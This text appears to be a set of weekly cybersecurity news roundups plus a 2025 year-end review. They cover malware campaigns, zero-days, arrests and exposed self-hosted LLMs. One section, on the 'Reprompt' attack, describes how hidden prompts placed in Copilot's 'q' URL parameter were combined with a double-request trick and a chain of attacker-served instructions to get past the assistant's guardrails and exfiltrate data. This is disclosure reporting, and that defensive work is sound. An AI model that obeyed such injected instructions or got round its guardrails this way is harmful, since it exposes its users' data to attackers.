SentinelLABS and Censys revealed this week a sprawling network of 175,000 open-source AI systems hosted across 130 countries, warning that these exposed systems lack basic security protections like authentication and monitoring that major AI platforms implement by default.

Over 293 days of scanning, researchers identified a persistent core of 23,000 systems generating most activity, with many configured to execute code, access external systems, and process images. The systems are concentrated in cloud services and residential networks, where their IP addresses appear as legitimate household or business traffic, making it difficult to trace malicious activity back to attackers.

The research highlights how attackers could commandeer these unauthenticated systems to generate spam, phishing emails, and disinformation campaigns while appearing to operate from trusted networks. Researchers found at least 201 systems explicitly configured with safety guardrails removed. Because these systems lack authentication, attackers can access them at no cost while victims pay the infrastructure bills.

The researchers say the vast, unmanaged layer of LLMs represent a “governance inversion”: The systems are scattered across thousands of networks, but they all run the same handful of AI models. If one of those models has a vulnerability, it affects thousands of systems at once, but there’s no single entity responsible for securing all those deployments.

The researchers conclude that those running self-hosted AI systems should secure them with the same authentication, monitoring, and network controls used for other externally accessible infrastructure. However, the research notes that residential deployments require different approaches, as home users aren’t held to the same security requirements as businesses running AI systems on cloud infrastructure.

The Ugly | Newly Patched Microsoft Office Zero-Day Allows Security Feature Bypass

Microsoft has released emergency out-of-band security updates to address a high-severity zero-day vulnerability in Office, tracked as CVE-2026-21509 (CVSS score: 7.8). The flaw is currently being exploited in the wild and affects Office 2016, 2019, LTSC 2021, LTSC 2024, and Microsoft 365 Apps for Enterprise.

CVE-2026-21509 is a security feature bypass flaw that allows attackers to exploit COM/OLE controls in Office. Attackers send malicious files to targets and use social engineering techniques to convince victims to open the documents. The exploit is possible because Office relies on untrusted inputs when processing COM/OLE controls, enabling low-complexity attacks that require no authentication.

Microsoft’s advisory states that Office 2021 and later are automatically protected via a service-side update, but users must restart their apps.

For Office 2016 and 2019, users must install specific updates. Microsoft has also outlined a Registry-based mitigation, requiring creation of a {EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B} subkey under COM Compatibility and adding a Compatibility Flags DWORD with a value of 400.

The vulnerability has been added to CISA’s Known Exploited Vulnerabilities (KEV) catalog, and the agency mandates that federal entities must patch affected systems by February 16, 2026.

As attackers continue to target Microsoft’s suite of products to access sensitive business data, users are advised to prioritize updating Office, applying Registry mitigations if needed, and exercising caution with untrusted Office documents to prevent compromise.

This update follows January 2026 Patch Tuesday, which addressed 114 flaws, including one other actively exploited zero-day in Desktop Window Manager enabling attackers to read memory addresses linked to remote ALPC ports.

The Good | Authorities Expose RaaS Leaders, Prosecute Identity Hackers & Tighten EU Cybersecurity Rules

Law enforcement in Ukraine and Germany have moved to dismantle Black Basta ransomware gang, confirming its leader and placing him on Europol and Interpol wanted lists. Identified as Oleg Evgenievich Nefedov, the Russian national is also known online as kurva, Washington, and S.Jimmi.

Police have also arrested two alleged Black Basta affiliates accused of breaching networks, cracking credentials, escalating privileges, and preparing ransomware attacks.

Investigators link Nefedov in a secondary role associated with the now-defunct Conti syndicate, confirming Black Basta’s evolution into a major ransomware-as-a-service (RaaS) operation responsible for hundreds of extortion incidents since 2022.

In the United States, Nicholas Moore, has pleaded guilty to breaching electronic filing systems tied to the Supreme Court of the United States, AmeriCorps, and the Department of Veterans Affairs. Prosecutors note that he repeatedly accessed the Supreme Court’s restricted system in 2023 using stolen credentials. He also breached AmeriCorps and veterans’ accounts, stealing and leaking sensitive personal and health data. Moore took to Instagram under the account @ihackedthegovernment to post screenshots of his victims’ information. He has since confessed to one count of computer fraud, punishable by one year in prison and a $100,000 fine.

New cybersecurity legislation proposed by the European Commission mandates the removal of high-risk suppliers from telecom networks and shoring up defenses against state-backed and criminal cyber threats targeting critical infrastructure. The plan builds on shortcomings in the EU’s voluntary 5G Security Toolbox, originally designed to limit member’s reliance on high-risk vendors. It also grants the Commission authority to coordinate EU-wide risk assessments across 18 critical sectors, strengthens ICT supply chain security, and streamlines voluntary certification schemes to improve resilience and technological sovereignty.

The Bad | Contagious Interview Attackers Leverage Visual Studio Code to Deploy Backdoors

DPRK-linked threat actors behind the ongoing Contagious Interview campaign are evolving their tactics by using malicious Microsoft Visual Studio Code projects to deliver backdoors.

In new research, the attackers are seen masquerading as recruiters conducting job assessments, instructing targets to clone repositories from platforms like GitHub and open them in VS Code. Once opened, specially crafted task configuration files automatically execute, fetching obfuscated JavaScript payloads hosted on Vercel domains and deploying multi-stage malware.

This novel technique, first seen last month, leverages VS Code’s runOn: folderOpen feature to trigger execution whenever a project is accessed. Earlier variants delivered the BeaverTail and InvisibleFerret implants, while newer versions disguise droppers as benign spell-check dictionaries to achieve remote code execution.

As part of the final payload, the backdoor logic establishes a continuous execution loop to harvest basic host information and fingerprints systems before executing attacker-supplied code. In some cases, additional scripts are downloaded minutes later to beacon frequently to a remote server, run further commands, and erase traces of activity. Researchers note that parts of the malware may be AI-assisted due to its code structure and inline comments.

Targets are typically software engineers, especially those working in the cryptocurrency, blockchain, and fintech sectors, where access to source code, credentials, and digital assets is valuable. Parallel research shows similar abuse of VS Code tasks to deploy backdoors, cryptominers, and credential-stealing modules via multiple fallback methods.

DPRK-based threat actors are rapidly experimenting with various delivery methods to increase the success of their attacks. Developers can counter the threat by continuing to scrutinize third-party repositories, carefully review task configurations, and install only trusted dependencies.

The Ugly | Attackers Target Misconfigured Training Apps to Access Cloud Environments

Threat actors are targeting misconfigured web applications like DVWA and OWASP Juice Shop to infiltrate cloud environments of Fortune 500 companies and their security vendors.

These intentionally vulnerable apps, designed for security training and internal testing, are exposed publicly and tied to privileged cloud accounts, creating a perfect storm of risks advantageous to attackers. Researchers have found nearly 2000 live, exposed apps, many linked to overly permissive identity access management (IAM) roles on AWS, GCP, and Azure, often using default credentials.

Attackers are leveraging the apps to deploy crypto miners, webshells, and persistence mechanisms. About 20% of found DVMA instances contain malicious artifacts, including XMRig cryptocurrency miners and a self-restoring watchdog.sh script that downloads additional AES-256-encrypted tools and removes competing miners.

PHP webshells like filemanager.php are also being deployed, allowing file operations and command execution, sometimes with indicators hinting at the operators’ origin.

With these attacks active in the wild, organizations are urged to take steps to minimize their risk profile. Key defenses include maintaining a resource inventory, isolating test environments, and enforcing least-privilege IAM roles. By also replacing default credentials and automating resource expiration, organizations can eliminate systemic blind spots in non-production systems.

The Good | Authorities Arrest 34 in Black Axe Cyber Fraud Crackdown

Spanish police have arrested 34 suspects tied to a cyber fraud network allegedly linked to the Black Axe group, following a joint operation with Europol. After raids across four cities, authorities seized €66,400 in cash, vehicles, devices, and froze €119,350 held in bank accounts.

Investigators say the Nigeria-led ring ran man-in-the-middle (MitM) and business email compromise (BEC) scams, causing over $6 million in losses total. So far, four suspected leaders of the network habe been jailed pre-trial as the probe continues into Europe-wide money mule networks.

In other news this week, the latest iteration of BreachForums has suffered another data breach after a MyBB users database was leaked online. This occurred after a site named after the ShinyHunters extortion gang released a 7Zip archive exposing over 323,000 user records and the forum’s PGP private key. While most IP addresses mapped to local loopback values, more than 70,000 resolved to public addresses valuable to cybersecurity researchers and law enforcement.

In Amsterdam, the nation’s Court of Appeal has sentenced a Dutch national to seven years for computer hacking and attempted extortion with evidence stemming from Sky ECC, an end-to-end encrypted chat service that Europol dismantled in 2021. Though one cocaine import charge was dropped, judges upheld the convictions tied to hacking port logistics systems in Rotterdam, Barendrecht, and Antwerp.

The individual was found using malware-laced USB sticks, which then enabled covert drug imports, data theft, and malware re-sale between 2020 and 2021.

The Bad | Researchers Expose ‘Reprompt’ Attack That Could Hijack Microsoft Copilot Sessions

Security researchers have disclosed a novel attack technique dubbed ‘Reprompt’ that could enable attackers to silently hijack a user’s Microsoft Copilot session and exfiltrate sensitive data with a single click. The method abuses how Copilot processes URL parameters, enabling malicious prompts to be injected directly through a legitimate Copilot link.

Reprompt works by embedding hidden instructions in the “q” parameter of a Copilot URL. Should a victim click the link, Copilot automatically executes the malicious prompt within the user’s authenticated session. That session remains active even after the Copilot tab is closed, meaning attackers could continue issuing follow-up commands without further user interaction. Since no plugins, malware, or visible prompts are required, the activity is effectively invisible.

To bypass Copilot’s safeguards, the researchers combined three techniques: parameter-to-prompt (P2) injection, a double-request trick that exploits guardrails applying only to the initial request, and a chain-request model where Copilot dynamically fetches new instructions from an attacker-controlled server.

Combined, these techniques could enable continuous, stealthy data exfiltration, while client-side, legacy security tools would be unable to determine what information was being stolen.

Reprompt only impacts Copilot Personal; those using Microsoft 365 Copilot are not impacted due to additional controls such as auditing, DLP, and administrative restrictions. Varonis disclosed the issue to Microsoft on August 31, 2025 and the vulnerability was addressed in this month’s Patch Tuesday. Currently, there are no reports of in-the-wild exploitation.

The findings, however, are indicative of the risks posed by LLMs and AI assistants. They underscore the need for security teams to understand the attack surface these tools present as their use in enterprise environments continues to proliferate.

The Ugly | Charity-Themed ‘PluggyApe’ Malware Targets Ukrainian Defense Forces

Ukraine’s CERT-UA has reported a charity-themed cyber espionage campaign targeting officials within the country’s Defense Forces between October and December 2025. The activity is attributed with medium confidence to a Russian-aligned threat group tracked as Laundry Bear (aka Void Blizzard or UAC‑0190), a cluster previously linked to the 2024 breach of Dutch police systems.

These attacks have been observed relying heavily on tailored social engineering tactics delivered via Signal and WhatsApp. Targets receive instant messages, often from compromised or spoofed Ukrainian phone numbers, directing them to fake charity websites where they are urged to download password-protected archives.

These archives contain malicious executables disguised as documents, including PIF files built with PyInstaller, which ultimately deploys a Python-based backdoor called ‘PluggyApe’. Once installed, PluggyApe profiles the infected system, assigns a unique victim identifier, and establishes persistence through Windows Registry changes. The malware supports remote command execution and data exfiltration, communicating over WebSocket or MQTT.

Later versions of PluggyApe, observed from December 2025 onward, introduced stronger obfuscation, additional anti-analysis checks, and more resilient command-and-control (C2) mechanisms. Instead of hardcoding C2 infrastructure, the malware dynamically retrieves server addresses from public paste services such as rentry[.]co and pastebin[.com], encoded in Base64, allowing operators to rapidly rotate infrastructure.

CERT-UA emphasized that mobile devices and messaging platforms have become primary attack vectors due to weaker monitoring and widespread trust. Compounding this is the attackers’ demonstrated knowledge of their targets and use of the Ukrainian language, audio, and video communication to increase credibility.

Alongside this campaign, CERT-UA also reports additional activity from other threat clusters targeting Ukrainian defense forces, local governments, and educational institutions using phishing, stealer malware, and open-source backdoors – all pointing to sustained and evolving cyber pressure facing Ukraine’s public sector.

The Good | U.K. Government Resets Public-Sector Cybersecurity With £210M Action Plan

The United Kingdom has unveiled a sweeping reset of its public-sector cybersecurity strategy, committing more than £210 million ($283 million) to shore up defenses across government departments and essential services. This investment is part of the new Government Cyber Action Plan, which marks a clear departure from years of fragmented oversight and outdated, legacy technology.

The new Government Cyber Action Plan sets a clear path to strengthen cyber security and boost resilience across the public sector.

Read more below https://t.co/HCswSOGuhP

— NCSC UK (@NCSC) January 6, 2026

The core of the plan is a centralized Government Cyber Unit, tasked with coordinating risk management, setting mandatory security standards, and leading incident response. Digital Government Minister Ian Murray framed the shift as urgent, warning that cyberattacks can take critical public services offline within minutes. Recent incidents like ransomware-driven NHS disruptions and the compromise of Ministry of Defence payroll systems all show that these risks are recurring realities rather than theoretical threats.

The action plan introduces stricter accountability for senior leaders, enhanced visibility into cyber risks, and more robust, centrally coordinated incident response exercises. Strategic government suppliers will also face tougher contractual cybersecurity requirements as concerns over supply chain vulnerabilities grow.

In tandem with the plan, the government is advancing the Cyber Security and Resilience Bill, which builds on the 2018 Network and Information System (NIS) Regulations. Separately, public bodies and critical infrastructure operators are set to be banned from paying ransomware demands, while telecom providers have pledged to curb phone-number spoofing.

While challenges still remain, this new strategy signals a long-overdue cultural and structural shift. If matched with sustained investment and accountability, it could finally place the U.K. public sector on a more resilient and security-first footing in the face of accelerating cyber threats.

The Bad | China-Linked UAT-7290 Expands Linux-Based Espionage Beyond South Asian Telcos

UAT-7290, a China-linked threat actor, has expanded its cyber espionage operations beyond its focus on South Asian telecommunications firms to include organizations across Southeastern Europe. Active since at least 2022, the group is known for its extensive reconnaissance, network penetration techniques, and heavy reliance on Linux-based malware to compromise public-facing infrastructure.

Cyber researchers assess that UAT-7290 conducts extensive technical profiling of targets before exploiting exposed edge network devices. The actor primarily leverages one-day exploits and targeted SSH brute force attacks, often relying on publicly available proof of concept (PoC) exploit code rather than developing their own. Once initial access is achieved, the group escalates privileges and deploys a modular malware ecosystem tailored for persistence and lateral movement.

UAT-7290’s core tooling centers on Linux implants, beginning with the RushDrop (ChronosRAT) initial dropper, which initiates the infection chain and deploys additional components such as DriveSwitch and the SilentRaid (MystRodX) backdoor. SilentRaid enables long-term access through a plugin-based architecture that supports remote shell access, port forwarding, file operations, and credential-related data collection. While Linux remains the primary focus, the group has occasionally deployed Windows malware – tools commonly shared among China-aligned threat actors.

UAT-7290 is also known for playing a secondary role as an initial access provider. It converts compromised devices into Operational Relay Boxes (ORBs), infrastructure that can later be reused by other Chinese espionage groups, using the Bulbature backdoor.

The tooling and infrastructure overlaps with clusters such as APT10 and Moshen Dragon, reinforcing assessments that UAT-7290 is both an espionage operator and a strategic enabler within the broader Chinese cyber ecosystem.

The Ugly | Researchers Reveal Critical n8n Vulnerabilities Enabling Remote Code Execution

A series of critical vulnerabilities were recently disclosed in the open-source workflow automation platform n8n, allowing unauthenticated attackers to achieve remote code execution (RCE), perform arbitrary commands, and execute untrusted code leading to full compromise.

Beginning with CVE-2025-68668 dubbed ‘N8scape’, this critical flaw (CVSS 9.9) involves a sandbox bypass in the Python Code Node using Pyodide. It works by affecting n8n versions prior to 2.0.0 and allows users with workflow permissions to execute arbitrary OS commands with the same privileges as the n8n service. With version 2.0.0, a task runner-based native Python implementation that improves security isolation was made default thus addressing the issue.

Shortly afterward, n8n disclosed an even more severe issue tracked as CVE-2026-21877, a CVSS 10.0 vulnerability enabling authenticated remote code execution under certain conditions. Affecting both self-hosted and n8n cloud deployments, the flaw could allow untrusted code execution, eventually leading to compromise of the entire instance. Although the critical flaw is patched in version 1.121.3, administrators are advised to apply the updates quickly, especially given a growing pattern of critical RCE-class vulnerabilities in the platform.

The third and latest disclosure this week, codenamed ‘Ni8mare’ and tracked as CVE-2026-21858 (CVSS 10.0), is a critical flaw that allows complete takeover of affected instances. Exploiting a content-type confusion issue in n8n’s webhook and form handling, attackers can read arbitrary files, extract credentials and encryption keys, forge admin sessions, and ultimately achieve RCE. Researchers noted that a compromised n8n instance becomes a single point of failure due to centralized storage of API keys, OAuth tokens, and infrastructure credentials, making it a veritable data trove for threat actors.

At the time of writing, reports from attack surface management vendors are observing over 26,000 exposed n8n instances online, emphasizing the need for timely patching, controlled exposure, and strict access management.

The Good | Authorities Crackdown on BlackCat and Coinbase Malicious Insiders & Malware Operators

Two former employees from Sygnia and DigitalMint have pleaded guilty for participating in ransomware attacks linking them to the BlackCat (ALPHV, AlphaVM) operation. Ryan Goldberg and Kevin Martin admitted to conspiring to extort U.S. organizations, abusing the same security expertise they once used to defend cyber victims. Working with a third accomplice, they breached multiple companies nationwide and shared roughly 20% of ransom proceeds for access to BlackCat’s infrastructure. Prosecutors say they demanded between $300,000 and $10 million per victim.

Alternative to insider risk at the highest technical levels, similar threats are emerging from much lower in the access chain, too. Indian authorities arrested a former customer support agent for aiding threat actors in the May data breach at Coinbase, a popular cryptoexchange with more arrests are expected. The incident exposed data from roughly 69,500 users after bribed staff at outsourcing partner, TaskUs, enabled access. This news follows charges against Ronald Spektor, accused of stealing $16 million by impersonating Coinbase, highlighting ongoing insider and social engineering risks.

We have zero tolerance for bad behavior and will continue to work with law enforcement to bring bad actors to justice.

Thanks to the Hyderabad Police in India, an ex-Coinbase customer service agent was just arrested. Another one down and more still to come.

— Brian Armstrong (@brian_armstrong) December 26, 2025

Beyond insider abuse, attackers are also exploiting everyday user behavior to siphon funds at massive scale. A Lithuanian national was arrested for allegedly infecting 2.8 million systems with clipboard-stealing malware disguised as KMSAuto, an illegal Windows and Office software activator. The suspect used clipper malware to swap cryptocurrency addresses and divert funds to attacker-controlled ones. Korean National Police Agency says the campaign ran from 2020 to 2023, with a total of KRW 1.7 billion ($1.2M) stolen across thousands of transactions. Authorities warn that pirated software is often a key component in how attackers spread malware.

The Bad | Chinese-Based Attackers Deploy Stealthy Kernel‑Mode ‘ToneShell’ Backdoor

Security researchers have uncovered a significantly more stealthy variant of the ToneShell backdoor, a tool long associated with Chinese state-sponsored cyberespionage activity, now delivered via a kernel‑mode loader for the first time. New analysis links the campaign to G0129 (aka Bronze President, TEMP.Hex, Hive0154), a threat actor known for targeting government agencies, NGOs, and think tanks.

The activity, observed since at least February, primarily targets government organizations across Asia, particularly in Myanmar and Thailand. Investigators have found evidence that some victims had previously been compromised by earlier ToneShell variants, PlugX malware, or the ToneDisk USB worm, indicating long‑term persistence across multiple intrusion waves.

What sets this campaign apart is its use of a malicious kernel‑mode mini‑filter driver, ProjectConfiguration.sys, signed with a stolen or leaked digital certificate originally issued to Guangzhou Kingteller Technology Co., Ltd and valid between 2012 to 2015. Operating deep within the Windows kernel, the driver acts as a rootkit: evading static analysis by resolving kernel APIs at runtime, blocking file deletion and registry access, protecting injected processes, and deliberately interfering with Microsoft Defender by manipulating the WdFilter driver’s load order.

The driver ultimately injects two user‑mode payloads, including the updated ToneShell backdoor, which now features enhanced stealth capabilities. Changes also include a simplified host‑ID scheme, network traffic obfuscation using fake TLS headers, and remote administration capabilities such as file transfer and interactive shell access. Communication occurs over TCP port 443 to an attacker‑controlled infrastructure.

Researchers note this marks a clear evolution in G0129’s tactics, prioritizing kernel‑level persistence and evasion. As the payload operates almost entirely in memory, memory forensics becomes a critical detection method, alongside monitoring for indicators of compromise tied to the malicious driver and injected shellcode.

The Ugly | Hackers Steal $7M via Compromised Trust Wallet Chrome Extension

After a compromised update to the Trust Wallet Chrome extension went live over the holidays, approximately $7 million has been stolen from nearly 3,000 cryptocurrency wallets. The malicious version 2.68.0 contained a hidden JavaScript file called 4482.js that silently exfiltrated sensitive wallet data, including seed phrases, to an external server, api.metrics-trustwallet[.]com. Users immediately reported funds disappearing after simple wallet authorizations, prompting Trust Wallet to investigate and release a patched version 2.69. CEO Eowyn Chen confirmed the hack and assured users that the company would reimburse affected wallets.

Investigations indicate that attackers likely exploited a leaked Chrome Web Store API key to publish the malicious extension, bypassing Trust Wallet’s standard release procedures. In parallel, threat actors launched a phishing campaign using a Trust Wallet-branded site, fix-trustwallet[.]com, claiming to provide a “vulnerability fix”. Users who entered their seed phrases on the site immediately lost access to their wallets. WHOIS records suggest the phishing domain may be linked to the same actors behind the malicious extension.

Trust Wallet, a non-custodial cryptocurrency wallet acquired by Binance in 2018, emphasized that mobile-only users and other browser extension versions were not affected. The company has begun reimbursing victims after verifying wallet ownership, transaction hashes, and affected addresses, while warning users not to share private keys or seed phrases.

Security researchers noted the incident highlights significant risks in browser-based wallets and supply chain attacks, as malicious updates can gain privileged access to funds. Trust Wallet has suspended compromised API keys, reported the malicious domains to registrars, and continues monitoring for scams. Users are strongly advised to immediately update to version 2.69, only use official channels, and verify all communications to protect their crypto assets.

It’s that time of year where we re-visit the wins and challenges from 2025 in our special year-end edition of The Good, The Bad and the Ugly. Here are the biggest stories that defined the best, the worst, and the ugliest cybersecurity moments from this past year.

The Best

2025 has been a year of remarkable victories for law enforcement agencies worldwide, highlighting the power of cross-border coordination. From high-profile arrests to major asset seizures, authorities have steadily dismantled the infrastructure supporting criminal and state-aligned cyber actors.

In the last two weeks, Eurojust led a takedown of Ukrainian call centers defrauding Europeans of €10M and law enforcement seizing servers from E-Note crypto exchange laundering $70M through ransomware and account takeovers. Similarly, the arrest of Ukrainian national Victoria Dubranova for aiding Russian state-backed hacktivists, alongside Spanish authorities capturing a 19-year-old selling 64M stolen records, underscores the growing international effort to hold cybercriminals accountable.

Significant infrastructure disruptions further amplify these successes. Convictions of cybercriminals targeting sensitive systems, such as the prison sentence for the “evil twin” WiFi hacker and seizure of the Cryptomixer crypto mixer with €1.3B laundered since 2016, are tangible results in stopping large-scale fraud. Law enforcement groups also took on multifaceted approaches, combining legal action, sanctions, and operational disruption to arrest Russian and DPRK-related cybercriminals and place sanctions on bulletproof hosting providers and foreign actors.

Our joint guidance on bulletproof hosting providers highlights best practices to mitigate potential cybercriminal activity, including recommended actions that ISPs can implement to decrease the usefulness of BPH infrastructure. Learn more https://t.co/cGQpuLpBPP pic.twitter.com/tM55acfuQv

— CISA Cyber (@CISACyber) November 19, 2025

International coordination has also been key this year. Interpol’s massive operations across Africa, including Operation Serengeti 2.0 and Operation Red Card, led to the arrests of thousands of suspects and the seizure of tens of millions in stolen assets. Europol dismantled SIMCARTEL, a global SIM-box fraud network, seizing servers, SIM cards, crypto, and luxury vehicles, while coordinated actions targeted Diskstation ransomware gangs and hacktivist infrastructures. In parallel, DOJ and CISA-led operations disrupted high-value schemes, including Prince Group’s $15B romance scam and multiple ransomware networks, while releasing decryptors for Phobos and 8Base victims to provide tangible relief. Law enforcement also extended their reach to regulatory and infrastructure initiatives as well, introducing the Cyber Trust Mark certification for IoT devices and HIPAA encryption and MFA updates to ensure cyber safety from the top down.

On the cybersecurity innovation front, CISA’s launch of Thorium, an open-source platform to help government agencies automate forensic investigations, and AI-enabled threat detection systems have allowed authorities to act on incidents more rapidly, from ransomware affiliate seizures to monitoring AI misuse.

The Worst

State-sponsored crime, supply chain abuse, and emerging malware strains have collectively challenged defenders worldwide.

North Korea’s DPRK-linked hackers were prolific throughout 2025, stealing over $2B in cryptocurrency, blending traditional heists with espionage campaigns like Operation Contagious Interview targeting remote workers. Similarly, Iranian-linked UNK_SmudgedSerpent and China-linked TA415 campaigns leveraged phishing, fake platforms, and developer tooling to compromise high-value targets, from policy experts to enterprise networks.

2025 saw developer platforms, open-source ecosystems, and smart contracts become prime targets for threat actors. VS Code extensions like Bitcoin Black and Codo AI exfiltrated credentials from crypto wallets, while NPM packages such as XORIndex and os-info-checker-es6 delivered multi-stage payloads. Novel malware families including SleepyDuck RAT and Betruger backdoors emerged, masquerading as popular extensions on the Open VSX open-source registry and supporting ransomware campaigns, respectively. Even AI-powered attacks emerged, with AkiraBot, Gamma AI phishing, and social engineering campaigns bypassing CAPTCHAs and traditional defenses to exploit SMBs and enterprise targets.

This year, financial and operational impacts were particularly severe. Holiday banking fraud alone netted $262M via account takeovers exploiting phishing, MFA bypasses, and impersonation. YouTube trading bot scams, cloud identity theft campaigns, and multi-stage ransomware attacks like EncryptHub and Katz Stealer drained millions, targeting both enterprise systems and individuals. Exploits in misconfigured cloud resources and abandoned subdomains further amplified these risks, showing how minor misconfigurations can fuel sophisticated attacks.

State-aligned and nation-state threat actors also pursued espionage alongside financial crime. Fake job schemes and AI/crypto talent lures enabled targeted malware deployment, while advanced persistent threats like UNC3886 delivered stealthy backdoors to corporate and diplomatic networks. Malicious actors increasingly weaponized cloud services, messaging platforms, and developer tools, blurring the line between operational convenience and attack vectors.

The Ugliest

The “Ugly” dimension of 2025 was defined by AI-assisted attacks, zero-day exploitation, and ransomware industrialization, which amplified the scale and complexity of cybercrime. Large ransomware operations like CyberVolk resurfaced with AI-driven VolkLocker, automating negotiation, phishing, and multilingual attacks while leveraging Telegram for orchestration. AI also enhanced the capabilities of smaller, fragmented ransomware crews, allowing rapid targeting and payload deployment, though operational flaws sometimes limited effectiveness.

Zero-day vulnerabilities were actively exploited across critical infrastructure and enterprise platforms. React2Shell in React/Next.js, Triofox (CVE-2025-12480), Oracle E-Business Suite (CVE-2025-61884), and ToolShell in SharePoint permitted full system compromise, highlighting that popular frameworks and business-critical software remain high-value targets. Cloud and AI services were similarly exploited; EchoLeak and Google Gemini LLM prompt injections enabled exfiltration of sensitive information without user interaction. Attackers in all these cases demonstrated a capacity to combine stealth, automation, and sophisticated payloads for maximum disruption.

Update: See newly added info to our #ToolShell Alert. We’ve included info on ransomware deployment, new webshells involved in exploitation, & detection guidance https://t.co/Y37FHSeAL0 pic.twitter.com/C5aMXNOmAU

— CISA Cyber (@CISACyber) July 24, 2025

2025 also saw cyber espionage intertwined with physical and geopolitical threats. Iranian-backed Crimson Sandstorm leveraged cyber reconnaissance to support missile strikes, while Chinese and DPRK actors continue to target aid operations, humanitarian NGOs, and government infrastructure, often exploiting IoT, industrial control systems, or open-source software to do so. In cross-border campaigns, long-dwell malware like BRICKSTORM and protocol-level exploits such as MadeYouReset created cascading impacts across critical networks and infrastructure.

The risk factor in many attacks this year were amplified by third-party risks. Breaches of Discord vendors, Mixpanel, and GitHub Actions exposed vast quantities of PII and credentials, enabling subsequent ransomware, phishing, or espionage campaigns. The combination of AI, automation, and high-impact vulnerabilities exemplifies a cybercrime industrial complex, where opportunistic and state-aligned actors scale operations with unprecedented speed and sophistication.

Conclusion

As 2025 draws to a close, one thing is clear: Cybersecurity has become more interconnected, more consequential, and more dependent on collective responsibility than ever before. From supply chain fragility and identity-based intrusion to the continued convergence of cybercrime and geopolitics, the challenges ahead demand deeper collaboration, stronger accountability, and a more deliberate approach to trust across the digital ecosystem.